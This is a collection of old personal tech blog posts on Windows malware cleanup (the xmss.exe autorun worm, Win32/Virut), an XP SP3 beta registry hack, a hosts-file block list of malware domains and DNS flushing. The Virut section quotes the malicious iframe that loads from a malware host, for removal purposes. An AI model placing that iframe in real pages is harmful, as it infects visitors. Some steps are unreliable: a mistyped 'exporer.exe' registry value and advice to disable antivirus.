Yesterday I got a new type of “Stupid Worm” hidding in background as xmss.exe. It copied itself on Local disk and Windows Directory (%Windir%). Terminated “Windows Task Manager”, Windows Command Prompt (DOS-Prompt) & crashed System Internal Process Explorer (procxp.exe).

Its not a funny video

According to McAfee, this worm is known as W32/Autorun.worm.g.

It can propagate itself over removable media and network drives and cause execution of malicious code via an autorun.inf file.

XMSS.exe Win32 AutoRun Files

• x:autorun.inf
• x:xmss.exe
• x:Funny UST Scandal.avi.exe
• %Windir%\autorun.inf
• %Windir%\xmss.exe
• %Windir%\Funny UST Scandal.avi.exe

Fixes Win32 AutoRun.* Worm

Here’s a few step to prevent Win32 AutoRun Worm.

1. Disabled System Restore for Temporary - KB 264887
2. Boot Windows in Safe Mode - KB 315222

3. In Windows Safe Mode, Open Windows Registry Editor

   Windows Start > Run > Regedit

4. Browse to the following registry settings ↓

   HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell

5. Replace
   explorer.exe, xmss.exe with exporer.exe
   
6. Delete all the following files
   • C\autorun.inf
   • C\xmss.exe
   • C\Funny UST Scandal.avi.exe
   • X:\autorun.inf
   • X:\xmss.exe
   • X:\Funny UST Scandal.avi.exe
   • %Windir%\autorun.inf
   • %Windir%\xmss.exe
   • %Windir%\Funny UST Scandal.avi.exe

   %Windir% refers to the Windows folder (e.g. C:\Windows, C:\WindowsNT) and X: is drive letters used by a removable or network drive

7. Clean All Windows Temporary Files
8. Restart Windows

XMSS.exe Win32 Autorun Variants

VirusTotal.com - Dec 2007 Results.

External Links

• How to Enable and Disable System Restore
• Safe Mode Boot options in Windows

Windows XP Service Pack 3 (RC) (12/18/2007) is not release for public yet. Before you try this registry hack, go to MS Download Center and see if you are allowed to download the update package.

• Microsoft Download Center → Windows XP Service Pack 3 Release Candidate.

If the above failed you may try the Beta Tester hack below.

The following registry hack will set you as one of the Beta Tester so you can download SP3 at Microsoft Download Center.

@echo off
reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\XPSP3 /f 2> NUL
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\XPSP3 /v RCPreview /t REG_SZ /d 1c667073-b87f-4f52-a479-98c85711d869 /f

Copy the above code and save it as sp3betatester.bat or sp3betatester.cmd in your “C:\”. Run the sp3betatester.* file and go to start → windows update. You should now see Windows XP SP3 (rc) listed in the available updates.

Microsoft Disclaimer
This pre-release software is provided for testing purposes only. Microsoft does not recommend installing this software on primary or mission critical systems. Microsoft recommends that you have a backup of your data prior to installing any pre-release software.

Uninstaller

SP3 installation has a recovery mode (rollback) make sure System Restore is enable when you setup SP3. You can removed SP3 via Windows Add Remove Programs or by manual using its build in uninstaller at C:\WINDOWS\$NtServicePackUninstall$\spuninst

External Links

• Windows XP Service Pack 3 Overview
• Official Windows XP SP3 Forum

AcroRd32Info is a another creative pieces of crap from Adobe a package for Acrobat Reader. Embed in Windows Explorer Shell, its main role is to start an initial prefetching for PDF documents in the Memory.

To test this program behavior, you will need to open your windows task manager (ctrl+alt+del once) and browse to any folder that contained a PDF documents and stay idle. Within just few seconds AdobeRd32Info will be loaded in the background and stay in memory.That was just for browsing the folder without opening any PDF files yet.

Windows has a standard prefetch modes and its fairly stable for most of the applications out there. Having a another background prefetcher hook on explorer is plain abusive not to mention its running without the owner permissions.

Adobe Reader is cheating. Its understable that with this methods it will improve the Acrobat boot time log, but I dont see much differences when its running in the background preparing to load a single PDF documents, its a pollutions.

AcroRd32Info stay in your memory so consider it as a pestware.

Here’s how you can safely removed this programs.

The proper way

• open Adobe AcroRd32
• Edit » Preferences
• Select the internet categories in the menu list then disabled
  Allow fast web view & Allow speculative downloading in the background

If thats doesnt work, you try this unrecommended method to disabled it.

• Browse to Adobe Reader directory usually at “Program Files\Adobe\Reader\”
• Find AcroRd32Info.exe
• Rename it from AcroRd32Info.exe to Acro_Rd32Info.exe

Recent Exploit on Adobe Reader

Exploit:W32/AdobeReader.K

From FSECURE, Exploit:W32/AdobeReader.K is detection of a malicious PDF file that is being heavily spammed through e-mail and it appears as an attachment.
This malicious PDF file takes advantage of a vulnerability on the URI handling of PDF files. This vulnerability affects IE7, Adobe Acrobat, and Adobe Reader on some platforms.
Users should update their Adobe Reader installations.

Affected Software Versions

Adobe Reader 8.1 and earlier, Adobe Reader 7.0.9 and earlier. Adobe Acrobat Professional, 3D and Standard 8.1 and earlier versions, Adobe Acrobat Professional, Standard, 3D and Elements 7.0.9 and earlier.

More info on this exploits at National Vulnerability Database

There is many reason why you need to block certain website from being access in your network. below is a “the few reason why”.

1. It’s a warez and porn sites.
2. I don’t want my employee to view my Competitor Websites.
3. I’m using illegal software and It seem necessary to disable the automated online registry checkup. ;p
4. I’m against this [countryname] I want to block all this particular domain from being access.
5. I hated this [socialnetworksite]

Safe Blocking

Here’s two methods you can safely used to block or redirect unwanted website from being access without using third party software.

1. Block Website using Windows Host file

Open Window explorer, browse to C:\WINDOWS\system32\drivers\etc click on the file name “host” (the file has no extension) make a backup copy first. Then right click view file properties and disabled the read only attributes and open it with a text editor (i.e: notepad).

Windows host settings instructions note

This file contains the mappings of IP addresses to host names. Each entry should be kept on an individual line. The IP address should be placed in the first column followed by the corresponding host name. The IP address and the host name should be separated by at least one space.

route-to target-hostname
example
127.0.1.1 www.thewebsite.com

note: 127.0.1.1 is you localhost address this is where you want the target-hostname/website to redirect. thewebsite.com is the targeted website URL.

alternatively you can also redirect it to google
64.233.167.99 www.thewebsite.com

Save the file and restore back the read only mode, then type in the block address url in your browser see if works.

OpenDNS filtering

The second methods is universal, its work on any operating systems. OpenDNSfiltering. This articles wont teach you how to setup opendns, you can read it at https://www.opendns.com/start. After you had setup OpenDNS account. Read their KB39 articles

its pretty much straight forward from there on. I’m sure you wont have problem configuring opendns filter . everything is just 2 click way.

Example Blocked Lists

127.0.0.1	babe.the-killer.bz
127.0.0.1	www.babe.the-killer.bz
127.0.0.1	babe.k-lined.com
127.0.0.1	www.babe.k-lined.com
127.0.0.1	did.i-used.cc
127.0.0.1	www.did.i-used.cc
127.0.0.1	coolwwwsearch.com
127.0.0.1	www.coolwwwsearch.com
127.0.0.1	coolwebsearch.com
127.0.0.1	www.coolwebsearch.com
127.0.0.1	hi.studioaperto.net
127.0.0.1	www.hi.studioaperto.net
127.0.0.1	webbrowser.tv
127.0.0.1	www.webbrowser.tv

Notes: Notice the double entries for each domain example.com and www.example.com , You will need both long and short URL for effective blocking. Dont depend on canonical address

Its quite rare to see website attacking visitors but the following site is an exception.

1. girlhell.org
2. 66.79.184.58
3. Apr 27 08 - usawarez.net

There is few known threads from the above website

1. JS/Exploit.ADODB.Stream NAP Trojan
2. Hidden download.
3. usawarez - False Image Checksum/corrupted

Fracois Paget from McAfee explain in great details regarding this Stream Attack and their Complete Methods. I’m quite amazed with the analysis. read it all here.

DNS (Domain Name System), is the service which translates between Internet names and Internet addresses.

The Domain Name System is one of the foundations of the internet. It is the system that allows the translation of human-readable domain names into machines-readable IP addresses and the reverse translation of IP addresses into domain names.

When you surf on net the dns records will be cache inside your pc. This methods will make your browsing much faster because you wont need to resolve the dns each time you surf a site or network. But sometimes caching can be an issue when certain network change their ip address. You can resolve this by clearing or flushing the dns. Here a few simple command on how to flush your dns cache in PC, Mac & *nix operating systems.

Windows PC

Start > Run > ipconfig /flushdns

Mac

Open Console lookupd -flushcache

Linux

restart nscd daemon.
Open Console /etc/rc.d/init.d/nscd restart

Stop dnscache via Windows services

For windows, If you are having frequent issue with dns caching you can disabled the dns-client caching services with

• Start > Run net stop dnscache
• or manually stopping the services via services.msc (microsoft services console).
  sc servername stop dnscache

WordPress 2.3.1 Support Windows Live Writer RSD. I’m posting this via live writer. You can download this Polaroid plugins at LiveWriter Addons Gallery .

Photo courtesy of ChaosKaizer

I’d many programs installed in my PC (windows XP) within time, the start menu is getting clutter.

so here how you sort the menu in Alphabetical order for windows XP. Its actually pretty easy.

1. Start > All Programs > Select “Any programs”.
2. Right Click and Select “Sort By Name”.

For different version of windows you can digg it at Microsoft KB177482

I found this frustrating that most Anti-virus product will deleted or quarantine your infected files. I lost many projects because of this worms.

Don’t used “auto-clean/fix” online scanner if you favors your projects. Belows is step by steps fixes for win32/Virut. If you dont like manual editing you’ll need a search and replace tools for removing the embed code inside the infected files.

1. Make sure all of the infected (*.exe win32/virtob) files has been quarantine.
2. Optionally block outbound access to 78.109.19.139:80 & irc port 65520 in your firewall settings.
3. Disabled AntiVirus if any.
4. Shutdown your PC and start windows on SafeMode (Press F8 or F5 after BIOS screen).
5. Search all files with *.htm, *.html, *.php, *.asp extensions.
   delete or replace the following text (strings)

   <iframe src="http://ntkrnlpa.info/cr/?i=1" height="1" width="1"></iframe>

Search and Replace Tools

• For windows - there is lots of similar tools and I’m not sure which one to recommend as it seem most did the same thing so Google for “search-and-replace” pick your best.
• For Cygwin or *nix bash console - Used sed commands to search & replace strings in all infected files.
• Python in windows - You can try this solutions.

Win32/Virut Virustotal.com Results

Notes on Microsoft Windows Malicious Software Removal Tool

Update On: Nov,20 2007 by NoahArk
I have Win.32/virut files in my archive (for backup purpose). Last week I installed Microsoft Windows Malicious Software Removal tool v1.35 (Nov 13, 2007, KB890830).

Microsoft’s claimed this tool can fixes w32/Virut . But the results is much worsed than I expected. It doesn’t detect Win32/Virut on my windows XP SP2 instead halfway before the scan complete its trigger the worm and starts spreading as Win32/virtob & Virut[A-W] (infecting *.exe & *.html). I’d removed all Microsoft Removal tools (MS Malicious Software Removal tool, MS Defender,MS Baseline Security Analyzer). Microsoft Developer should have know better on how to prevent most of these type infections.Its their own design flaw and products.

I still keep the infected Win32/Virut files, if anyone need it please send an email to . My request to Microsoft Team, they should clean this crapy worms so all those unfortunate client’s (including me) wont have to hunt down on pricey antivirus solutions.

W32/Virut and ntkrnlpa.info

The worms started spreading since September 2006. After one year anniversay It still in the wild like it will never stop.

I’d send a letter to ntkrnlpa.info ISP (hosting.ua), and they have closed down the sites for good. And also google is blocking the site too it will give you a warning notice if search for the particular url.

This worm spread via simple html tags and increased the filesize around 8kb. Because of this simple method and low damage most Anti-Virus and security vendor label it as medium and low. The thread label is debatable.

Based on wikipedia “Usage share of Web Browser Statistics”, 81% of Internet users is using Microsoft Internet Explorer (50% of this weblog visitors is on IE too ), IE browser doesn’t blocked IFRAME that can be a problem.

Imagine if some webmaster uploaded an infected files on heavy traffic websites like myspace and facebook. The results could be disaster. Nobody want to see its happening.

Related Entries

• Tips on How to safeguard your Windows when cleaning files infected by win32 virus.
• How to Block Acces to Unsavory Websites Without using Firewall or third party software

Just after my previous cleanup, now i got much worse virus on my PC its called Worm.Win32.Mefir [a-z] by both Norton Antivirus (Symantec) & Avast (Alwil Software) NOD32 identified it as Win32/Virut.NAT

At the time being It infected *.html & *.php files and probably all text/html types. There is no cure yet. I hated this worms I’d lost few project because of this. Try archive (LZMA) all your web projects before hand. Its spreading like wild fire.

I havent try cleaning the infected files with Trend HouseCall Online Scans. Just hope there is cure for this worm. damn damn